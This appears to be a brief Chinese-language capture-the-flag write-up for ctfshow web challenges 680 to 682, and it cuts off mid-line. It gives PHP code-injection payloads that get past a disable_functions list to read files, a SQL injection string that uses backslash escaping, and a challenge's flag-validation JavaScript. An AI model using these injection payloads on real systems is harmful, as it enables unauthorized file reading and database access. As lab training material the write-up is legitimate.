web680
code=phpinfo();
assert,system,passthru,exec,p***tl_exec,shell_exec,popen,
proc_open,p***tl_alarm,p***tl_fork,p***tl_waitpid,p***tl_wait
,p***tl_wifexited,p***tl_wifstoped,p***tl_wifsignaled,p***tl_wexitstatus,
p***tl_wtermsig,p***tl_wstopsig,p***tl_signal,
p***tl_signal_dispatch,p***tl_get_last_error,p***tl_strerror,fopen,
file_get_contents,fread,file,readfile,opendir,readdir,closedir,rewinddir
不能使用的函数是这些
但是还是可以看文件的
code=var_dump(scandir('/'));
看根目录啥也没有
code=var_dump(scandir('./'));
code=var_dump(scandir('.'));
看当前目录
code=highlight_file('secret_you_never_know');
或者直接访问下载文件
web681
sql注入
select count(*) from ctfshow_users where username = '123' or nickname = '123'
这里两个都值都被控不好直接闭合,那就和反斜杠转义
'||1#\
那么原句子就变成了
select count(*) from ctfshow_users where username = '||1#\' or nickname = '||1#\'
结果变成了
sql语句||1
web682
eval(function(p,a,c,k,e,r){
e=function(c){
return c.toString(a)};if(!''.replace(/^/,String)){
while(c--)r[e(c)]=k[c]||e(c);k=[function(e){
return r[e]}];e=function(){
return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){(3 a(){7{(3 b(2){9((\'\'+(2/2)).5!==1||2%g===0){(3(){}).8(\'4\')()}c{4}b(++2)})(0)}d(e){f(a,6)}})()})();',17,17,'||i|function|debugger|length|5000|try|constructor|if|||else|catch||setTimeout|20'.split('|'),0,{
}));
var c2n = c =>{
if(c.length>1){
return 0
}
if(c.charCodeAt()>0x60 && c.charCodeAt()<0x67){
return c.charCodeAt()-0x57
}
if(parseInt(c)>0){
return parseInt(c)
}
return 0;
}
var s2n2su = s =>{
r=0
for (var i = s.length - 1; i >= 0; i--) {
r+=c2n(s[i])
}
return r
}
function test(){
var m=document.getElementById("message").value;
var e = 'error';
if(sha256(m)!=="e3a331710b01ff3b3e34d5f61c2c9e1393***ba3e31f814e7debd537c97ed7d3d"){
return alert(e)
}
var start = m.substring(0,8);
if(start!=='ctfshow{'){
return alert(e);
}
if(m.substring(m.length,m.length-1)!=="}"){
return alert(e);
}
var s = m.substring(8,m.length-1)
if(s.length!==36){
return alert(e);
}
var k = s.split("-")
if(k.length!==5){
return alert(e)
}
if(s2n2su(k[0])!==63){
return alert(e)
}
if(sha256(k[0].substr(0,4))!=="c578feba1c2e657dba129b4012***f6a96f8e5f684e2ca358c36df13765da8400"){
return alert(e)
}
if(sha256(k[0].substr(4,8))!=="f9c1c9536***1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc"){
return alert(e)
}
if(parseInt(k[1][0])!==(c2n('a')-1)){
return alert(e)
}
if(k[1][1]+k[1][2]+k[1][3]!=='dda'){
return alert(e)
}
if(k[2][1]!=='e'){
return alert(e)
}
if(k[2][0]+k[2][2]+k[2][3]!=0x1ae){
return alert(e)
}
if(parseInt<